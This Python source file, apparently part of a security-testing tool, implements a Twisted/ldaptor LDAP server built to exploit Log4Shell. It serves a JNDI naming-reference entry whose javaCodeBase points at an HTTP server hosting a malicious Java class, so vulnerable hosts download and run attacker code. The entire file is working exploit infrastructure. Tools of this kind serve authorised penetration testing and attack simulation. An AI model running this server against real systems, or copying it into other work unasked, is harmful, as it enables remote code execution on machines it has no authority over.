import logging
import math
import multiprocessing
import tempfile
import threading
import time
from pathlib import Path

from ldaptor.interfaces import IConnectedLDAPEntry
from ldaptor.ldiftree import LDIFTreeEntry
from ldaptor.protocols.ldap.ldapserver import LDAPServer
from twisted.application import service
from twisted.internet import reactor
from twisted.internet.protocol import ServerFactory
from twisted.python import log
from twisted.python.components import registerAdapter

logger = logging.getLogger(__name__)

EXPLOIT_RDN = "dn=Exploit"
REACTOR_START_TIMEOUT_SEC = 30.0


class LDAPServerStartError(Exception):
    pass


class Tree:
    """
    An LDAP directory information tree (DIT) used to exploit log4shell
    Adapted from: https://ldaptor.readthedocs.io/en/latest/cookbook/servers.html
    """

    def __init__(self, http_server_ip: str, http_server_port: int, storage_dir: Path):
        self.path = tempfile.mkdtemp(prefix="log4shell", suffix=".ldap", dir=storage_dir)
        self.db = LDIFTreeEntry(self.path)

        self._init_db(http_server_ip, http_server_port)

    def _init_db(self, http_server_ip: str, http_server_port: int):
        attributes = {
            "javaFactory": ["Exploit"],
            "objectClass": ["javaNamingReference"],
            "javaCodeBase": [f"http://{http_server_ip}:{http_server_port}/"],
            "javaClassName": ["Exploit"],
        }

        self.db.addChild(EXPLOIT_RDN, attributes)


class LDAPServerFactory(ServerFactory):
    """
    Our Factory is meant to persistently store the ldap tree
    Adapted from: https://ldaptor.readthedocs.io/en/latest/cookbook/servers.html
    """

    protocol = LDAPServer

    def __init__(self, root):
        self.root = root

    def buildProtocol(self, addr):
        proto = self.protocol()
        proto.debug = self.debug
        proto.factory = self
        return proto


class LDAPExploitServer:
    """
    This class wraps the creation of an Ldaptor LDAP server that is used to exploit log4shell.
    Adapted from: https://ldaptor.readthedocs.io/en/latest/cookbook/servers.html
    """

    def __init__(
        self, ldap_server_port: int, http_server_ip: str, http_server_port: int, storage_dir: Path
    ):
        """
        :param ldap_server_port: The port that the LDAP server will listen on.

        :param http_server_ip: The IP address of the HTTP server that serves the malicious Log4Shell
                               Java class.

        :param http_server_port: The port the HTTP server is listening on.

        :param storage_dir: A directory where the LDAP server can safely store files it needs during
                            runtime.
        """
        self._reactor_startup_completed = multiprocessing.Event()
        self._ldap_server_port = ldap_server_port
        self._http_server_ip = http_server_ip
        self._http_server_port = http_server_port
        self._storage_dir = storage_dir

        # A Twisted reactor can only be started and stopped once. It cannot be restarted after it
        # has been stopped. To work around this, the reactor is configured and run in a separate
        # process. This allows us to run multiple LDAP servers sequentially or simultaneously and
        # stop each one when we're done with it.
        self._server_process = multiprocessing.Process(
            target=self._run_twisted_reactor, daemon=True
        )

    def run(self):
        """
        Runs the Log4Shell LDAP exploit server in a subprocess. This method attempts to start the
        server and blocks until either the server has successfully started or it times out.

        :raises LDAPServerStartError: Indicates there was a problem starting the LDAP server.
        """
        logger.info("Starting LDAP exploit server")
        self._server_process.start()
        reactor_running = self._reactor_startup_completed.wait(REACTOR_START_TIMEOUT_SEC)

        if not reactor_running:
            raise LDAPServerStartError("An unknown error prevented the LDAP server from starting")

        logger.debug("The LDAP exploit server has successfully started")

    def _run_twisted_reactor(self):
        logger.debug(f"Starting log4shell LDAP server on port {self._ldap_server_port}")
        self._configure_twisted_reactor()

        # Since the call to reactor.run() blocks, a separate thread is started to poll the value
        # of `reactor.running` and set the self._reactor_startup_complete Event when the reactor
        # is running. This allows the self.run() function to block until the reactor has
        # successfully started.
        threading.Thread(target=self._check_if_reactor_startup_completed, daemon=True).start()
        reactor.run()

    def _check_if_reactor_startup_completed(self):
        check_interval_sec = 0.25
        num_checks = math.ceil(REACTOR_START_TIMEOUT_SEC / check_interval_sec)

        for _ in range(0, num_checks):
            if reactor.running:
                logger.debug("Twisted reactor startup completed")
                self._reactor_startup_completed.set()
                break

            logger.debug("Twisted reactor has not yet started")
            time.sleep(check_interval_sec)

    def _configure_twisted_reactor(self):
        LDAPExploitServer._output_twisted_logs_to_python_logger()

        registerAdapter(lambda x: x.root, LDAPServerFactory, IConnectedLDAPEntry)

        tree = Tree(self._http_server_ip, self._http_server_port, self._storage_dir)
        factory = LDAPServerFactory(tree.db)
        factory.debug = True

        application = service.Application("ldaptor-server")
        service.IServiceCollection(application)
        reactor.listenTCP(self._ldap_server_port, factory)

    @staticmethod
    def _output_twisted_logs_to_python_logger():
        # Configures Twisted to output its logs using the standard python logging module instead of
        # the Twisted logging module.
        # https://twistedmatrix.com/documents/current/api/twisted.python.log.PythonLoggingObserver.html
        log_observer = log.PythonLoggingObserver()
        log_observer.start()

    def stop(self, timeout: float = None):
        """
        Stops the LDAP server.

        :param timeout: A floating point number of seconds to wait for the server to stop. If this
                        argument is None (the default), the method blocks until the LDAP server
                        terminates. If `timeout` is a positive floating point number, this method
                        blocks for at most `timeout` seconds.
        """
        if self._server_process.is_alive():
            logger.debug("Stopping LDAP exploit server")

            # The Twisted reactor registers signal handlers so it can catch SIGTERM and gracefully
            # shutdown.
            self._server_process.terminate()
            self._server_process.join(timeout)

            if self._server_process.is_alive():
                logger.warning("Timed out while waiting for the LDAP exploit server to stop")
            else:
                logger.debug("Successfully stopped the LDAP exploit server")
